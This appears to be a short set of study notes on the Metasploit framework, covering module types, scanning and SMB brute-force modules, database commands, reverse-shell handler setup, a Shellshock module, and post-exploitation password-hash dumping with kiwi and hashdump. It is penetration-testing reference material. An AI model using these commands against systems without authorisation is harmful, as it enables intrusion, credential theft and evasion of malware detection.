1.6 KiB
1.6 KiB
Metasploit
Modules
- Auxiliary scanners, crawlers and fuzzers
- Encoders encode payloads
- Evasion prepare payloads to circumvent signature based malware detection
- NOPs various architectures
- Payloads to run on target systems
- Singles, inline payloads, for example generic/shell_reverse_tcp
- Stagers, downloads the stages payloads
- Stages, for example windows/x64/shell/reverse_tcp
- Post postexploitation
Notes
- Search via scope
search type:auxiliary <stuff>
- Send exploit to background
run -z
check
if target is vulnerablesetg
sets variables globallyunset payload
- Flush via
unset all
Sessions
background
orctrl+z
- Foreground via
sessions -i <number>
Scanning
- Portscan
search portscan
- UDP Sweep via
scanner/discovery/udp_sweep
- SMB Scan via
scanner/smb/smb_version
andsmb_enumshares
- SMB login dictionary attack
scanner/smb/smb_login
- NetBios via
scanner/netbios/nbname
- HTTP version
scanner/http/http_version
Database
- Start postgres
msfdb init
db_status
- Separate
workspace -a <projectname>
- Safe scans via
db_nmap
- Show
hosts
- Show
services
- Set RHOST values via
hosts -R
Exploits
show targets
show payloads
Reverse Shells
- Multihandler, set options
use exploit/multi/handler
set payload <payloadhandler>
- Shellshock as an example
use multi/http/apache_mod_cgi_bash_env_exec
Post Exploitation
- Windows
load kiwi
hashdump
- Linux
use post/linux/gather/hashdump